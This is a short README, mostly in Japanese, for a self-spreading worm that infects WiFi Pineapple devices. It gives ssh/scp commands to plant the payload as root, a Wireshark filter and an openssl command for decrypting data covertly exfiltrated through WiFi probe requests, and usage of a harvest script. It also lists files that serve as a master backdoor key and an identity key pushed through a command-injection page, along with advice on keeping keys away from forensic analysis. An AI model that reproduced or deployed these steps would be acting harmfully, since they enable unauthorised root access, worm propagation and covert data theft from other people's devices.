
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
注: 設定済みのデバイスが必要です。または、metasploit-moduleを使用してsshを有効にしてください
wiresharkフィルタは次のとおり:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
必要に応じて、harvest.pyスクリプトを次のように使用します:
python harvest.py [monitor-iface]
| File | Purpose |
|---|---|
| tv | ウイルス本体。 |
| tvbd | 「マスター」バックドアキー。秘密鍵は配布しないでください。 |
| tvd | プローブ要求を介してデータを外部に持ち出すために使用される開示キー。 |
| tospo_rsa | 感染した各デバイスに固有で、転送キーとして使用されるID秘密鍵。 |
| tospo_rsa.pub | 秘密IDがリモートデバイス上でrootとして操作を実行できるようにするため、コマンドインジェクションページを介して転送されるID公開鍵。 |
| w | 以前の接続を復元するために使用される、プッシュされたワイヤレス設定オプション。 |
| n | 以前の接続を復元するために使用される、プッシュされたネットワーク設定オプション。 |
| 注: 'tv'で始まるファイルはすべて、新しいデバイスへの感染時に転送されます。'tv'で始まる名前を使用して秘密鍵などを追加しないでください。そうしないと、秘密鍵がフォレンジック分析にさらされます。 |